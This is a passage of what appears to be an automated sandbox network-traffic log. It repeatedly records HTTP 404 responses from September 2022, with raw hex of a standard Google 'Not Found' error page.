          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 